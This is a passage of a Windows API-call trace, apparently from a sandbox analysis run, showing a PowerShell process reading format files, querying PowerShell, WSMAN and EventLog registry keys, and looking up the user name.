lpBuffer=0x3408d7c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.557] GetLastError () returned 0x0 [0145.557] ReadFile (in: hFile=0x34c, lpBuffer=0x3408d7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3408d7c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.558] GetLastError () returned 0x0 [0145.558] ReadFile (in: hFile=0x34c, lpBuffer=0x3408d7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3408d7c*, lpNumberOfBytesRead=0x2de734*=0x8b4, lpOverlapped=0x0) returned 1 [0145.558] GetLastError () returned 0x0 [0145.558] ReadFile (in: hFile=0x34c, lpBuffer=0x34081d0, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x34081d0*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.558] GetLastError () returned 0x0 [0145.558] ReadFile (in: hFile=0x34c, lpBuffer=0x3408d7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3408d7c*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.558] GetLastError () returned 0x0 [0145.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x34c) returned 0x0 [0145.559] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.559] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.559] RegCloseKey (hKey=0x34c) returned 0x0 [0145.559] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x46ed90af, Data2=0xf8c3, Data3=0x4d7a, Data4=([0]=0xaf, [1]=0x44, [2]=0xc, [3]=0x4e, [4]=0x1f, [5]=0x75, [6]=0xe7, [7]=0x77))) returned 0x0 [0145.559] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x1383399e, Data2=0x72fc, Data3=0x4cb7, Data4=([0]=0x99, [1]=0xf2, [2]=0xbe, [3]=0x2b, [4]=0x17, [5]=0x7b, [6]=0xd2, [7]=0x1b))) returned 0x0 [0145.560] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0145.560] GetLastError () returned 0x0 [0145.560] GetFileType (hFile=0x34c) returned 0x1 [0145.560] SetErrorMode (uMode=0x1) returned 0x1 [0145.560] GetFileType (hFile=0x34c) returned 0x1 [0145.560] ReadFile (in: hFile=0x34c, lpBuffer=0x343fc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343fc88*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.560] GetLastError () returned 0x0 [0145.560] ReadFile (in: hFile=0x34c, lpBuffer=0x343fc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343fc88*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.560] GetLastError () returned 0x0 [0145.561] ReadFile (in: hFile=0x34c, lpBuffer=0x343fc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343fc88*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.561] GetLastError () returned 0x0 [0145.561] ReadFile (in: hFile=0x34c, lpBuffer=0x343fc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343fc88*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.561] GetLastError () returned 0x0 [0145.561] ReadFile (in: hFile=0x34c, lpBuffer=0x343fc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343fc88*, lpNumberOfBytesRead=0x2de734*=0xe98, lpOverlapped=0x0) returned 1 [0145.561] GetLastError () returned 0x0 [0145.561] ReadFile (in: hFile=0x34c, lpBuffer=0x343f2c0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343f2c0*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.561] GetLastError () returned 0x0 [0145.561] ReadFile (in: hFile=0x34c, lpBuffer=0x343fc88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x343fc88*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.561] GetLastError () returned 0x0 [0145.561] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x34c) returned 0x0 [0145.562] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.562] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.562] RegCloseKey (hKey=0x34c) returned 0x0 [0145.562] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x84e64539, Data2=0x3ff6, Data3=0x4ee2, Data4=([0]=0x9e, [1]=0x23, [2]=0xb6, [3]=0xb2, [4]=0x55, [5]=0x7d, [6]=0x70, [7]=0xe2))) returned 0x0 [0145.563] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xf15c4502, Data2=0x73f3, Data3=0x46c0, Data4=([0]=0x8e, [1]=0x21, [2]=0xe4, [3]=0x67, [4]=0x9a, [5]=0x24, [6]=0x5a, [7]=0x55))) returned 0x0 [0145.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0145.581] GetLastError () returned 0x57 [0145.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0145.581] GetLastError () returned 0x57 [0145.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0145.592] GetLastError () returned 0x57 [0145.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0145.593] GetLastError () returned 0x57 [0145.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.596] GetLastError () returned 0x57 [0145.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.596] GetLastError () returned 0x57 [0145.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0145.598] GetLastError () returned 0x57 [0145.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0145.598] GetLastError () returned 0x57 [0145.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.599] GetLastError () returned 0x57 [0145.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.600] GetLastError () returned 0x57 [0145.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0145.601] GetLastError () returned 0x57 [0145.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0145.601] GetLastError () returned 0x57 [0145.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0145.602] GetLastError () returned 0x57 [0145.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0145.602] GetLastError () returned 0x57 [0145.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.636] GetLastError () returned 0xcb [0145.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.637] GetLastError () returned 0xcb [0145.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.638] GetLastError () returned 0xcb [0145.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.640] GetLastError () returned 0xcb [0145.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.648] GetLastError () returned 0xcb [0145.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.650] GetLastError () returned 0xcb [0145.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.651] GetLastError () returned 0xcb [0145.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de7ac | out: phkResult=0x2de7ac*=0x34c) returned 0x0 [0145.655] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2de7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de800, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2de7fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de800*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.657] RegEnumValueW (in: hKey=0x34c, dwIndex=0x0, lpValueName=0x3da558, lpcchValueName=0x2de824, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x2de824, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.657] RegEnumValueW (in: hKey=0x34c, dwIndex=0x1, lpValueName=0x3da558, lpcchValueName=0x2de824, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x2de824, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.657] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2de804, lpData=0x0, lpcbData=0x2de800*=0x0 | out: lpType=0x2de804*=0x1, lpData=0x0, lpcbData=0x2de800*=0x8) returned 0x0 [0145.657] RegQueryValueExW (in: hKey=0x34c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2de804, lpData=0x3da558, lpcbData=0x2de800*=0x8 | out: lpType=0x2de804*=0x1, lpData="2.0", lpcbData=0x2de800*=0x8) returned 0x0 [0145.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de768 | out: phkResult=0x2de768*=0x31c) returned 0x0 [0145.783] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2de7b8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de7bc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2de7b8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de7bc*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.783] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x3da558, lpcchValueName=0x2de7e0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x2de7e0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.783] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x3da558, lpcchValueName=0x2de7e0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x2de7e0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0145.783] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2de7c0, lpData=0x0, lpcbData=0x2de7bc*=0x0 | out: lpType=0x2de7c0*=0x1, lpData=0x0, lpcbData=0x2de7bc*=0x8) returned 0x0 [0145.783] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2de7c0, lpData=0x3da558, lpcbData=0x2de7bc*=0x8 | out: lpType=0x2de7c0*=0x1, lpData="2.0", lpcbData=0x2de7bc*=0x8) returned 0x0 [0145.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.784] GetLastError () returned 0xcb [0145.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.786] GetLastError () returned 0xcb [0145.933] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de728 | out: phkResult=0x2de728*=0x320) returned 0x0 [0145.934] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2de790, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de78c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2de790*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de78c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.934] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.935] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.936] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x3da558, lpcchName=0x2de7ac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2de7ac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.936] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x324) returned 0x0 [0145.936] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.936] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x340) returned 0x0 [0145.936] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.936] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x350) returned 0x0 [0145.937] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.937] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x354) returned 0x0 [0145.937] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.937] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x358) returned 0x0 [0145.937] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.938] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x35c) returned 0x0 [0145.938] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.938] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x360) returned 0x0 [0145.938] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.938] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x364) returned 0x0 [0145.938] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x0) returned 0x2 [0145.938] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x368) returned 0x0 [0145.939] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de758 | out: phkResult=0x2de758*=0x36c) returned 0x0 [0145.939] RegCloseKey (hKey=0x36c) returned 0x0 [0145.939] RegCloseKey (hKey=0x320) returned 0x0 [0145.939] RegCloseKey (hKey=0x368) returned 0x0 [0145.980] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0145.981] GetLastError () returned 0x3 [0145.982] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.139] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de70c | out: phkResult=0x2de70c*=0x320) returned 0x0 [0146.139] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2de774, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2de770, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, 